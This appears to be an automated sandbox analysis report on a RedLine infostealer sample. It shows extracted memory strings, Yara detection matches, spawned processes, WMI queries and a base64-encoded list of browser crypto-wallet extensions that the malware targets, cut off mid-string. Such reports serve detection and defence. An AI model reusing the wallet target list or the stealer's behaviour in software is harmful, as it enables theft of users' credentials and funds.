                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422006641.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422006641.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                      Source: vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                      Source: vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.414788.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_004036200_2_00403620
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0040DA310_2_0040DA31
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0040C6880_2_0040C688
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0040F1520_2_0040F152
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0040D1100_2_0040D110
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0040CBCC0_2_0040CBCC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0040B3D30_2_0040B3D3
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeCode function: 0_2_0041B9A30_2_0041B9A3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_073608F82_2_073608F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9CA602_2_09F9CA60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9FA2F2_2_09F9FA2F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9EDD02_2_09F9EDD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F97EB82_2_09F97EB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9D0B82_2_09F9D0B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9E3192_2_09F9E319
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F962D82_2_09F962D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9C2882_2_09F9C288
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9E7902_2_09F9E790
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9CA512_2_09F9CA51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9C2782_2_09F9C278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F9E7802_2_09F9E780
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A004B382_2_0A004B38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09F995E82_2_09F995E8
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameThirdsmen.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, 00000000.00000000.315352225.0000000000439000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCarapace ruff0 vs SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeBinary or memory string: OriginalFilenameCarapace ruff0 vs SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeVirustotal: Detection: 30%
                      Source: SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@0/1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: 0.3.SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe.5e0000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaG